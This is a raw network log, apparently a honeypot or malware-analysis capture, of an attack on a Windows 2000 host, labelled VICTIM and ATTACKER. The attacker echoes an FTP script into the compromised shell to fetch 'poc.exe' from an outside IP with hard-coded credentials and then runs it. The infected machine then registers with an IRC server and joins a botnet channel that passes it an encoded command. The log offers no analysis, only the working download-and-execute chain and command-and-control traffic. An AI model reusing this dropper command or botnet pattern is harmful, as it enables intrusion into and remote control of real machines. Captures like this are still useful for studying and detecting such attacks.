VICTIM: Microsoft Windows 2000 [Version 5.00.2195] VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> ATTACKER: echo open 85.21.41.66 2555 >> asr_ppvfx &echo user xkidx 0xfff >> asr_ppvfx &echo binary >> asr_ppvfx &echo get poc.exe >> asr_ppvfx &echo quit >> asr_ppvfx &ftp -nv -s:asr_ppvfx &start poc.exe VICTIM: Connected to 85.21.41.66. ATTACKER: 220 FTP server ready. VICTIM: USER xkidx ATTACKER: 331 User xkidx OK. Password required VICTIM: PASS 0xfff ATTACKER: 230-User xkidx has group access to: 1004 1003 80 230 OK. Current directory is / VICTIM: TYPE I ATTACKER: 200 TYPE is now 8-bit binary VICTIM: PORT 192,168,1,228,4 ATTACKER: 200 PORT command successful ATTACKER: RETR poc.exe ATTACKER: 150-Connecting to port 1028150 138.1 kbytes to download ATTACKER: 226-File successfully transferred226 1.467 seconds (measured here), 94.15 Kbytes per second VICTIM: QUIT ATTACKER: 215-215 Logout. VICTIM: PASS secretpass VICTIM: NICK P|g41nfz90fUSER mrrook1fj * 0 :USA|2K|173 ATTACKER: :hub.41921.net 001 P|g41nfz90f :P|g41nfz90f!mrrook1fj@192.168.1.228:hub.41921.net 1 P|g41nfz90f :Login: :hub.41921.net 376 P|g41nfz90f : VICTIM: USERHOST P|g41nfz90f ATTACKER: :hub.41921.net 302 P|g41nfz90f :P|g41nfz90f=+mrrook1fj@192.168.1.228 VICTIM: USERHOST P|g41nfz90fMODE P|g41nfz90f JOIN #mm RSA ATTACKER: :hub.41921.net 302 P|g41nfz90f :P|g41nfz90f=+mrrook1fj@192.168.1.228 :hub.41921.net 221 P|g41nfz90f +:P|g41nfz90f!mrrook1fj@192.168.1.228 JOIN :#mm:hub.41921.net 332 P|g41nfz90f #mm :+yOfS7/ZgRdB.6w2GQ0tQkXD1bqhV7/ipBe01hiyOt1tAGoD0bni40/nobx.1kmNSG0Vilef/jw3NQ.1MD7F.mRPT00QScbE.oATra0H0nGx1d2vZX/C8d1J0u97R71RybXB/FrRdd0VMfKC1kSotz0n075k/wLZMb.FzK1Y/CQfNU0nWNus0vdVFY0rM6ME135Qy/1qcS5D0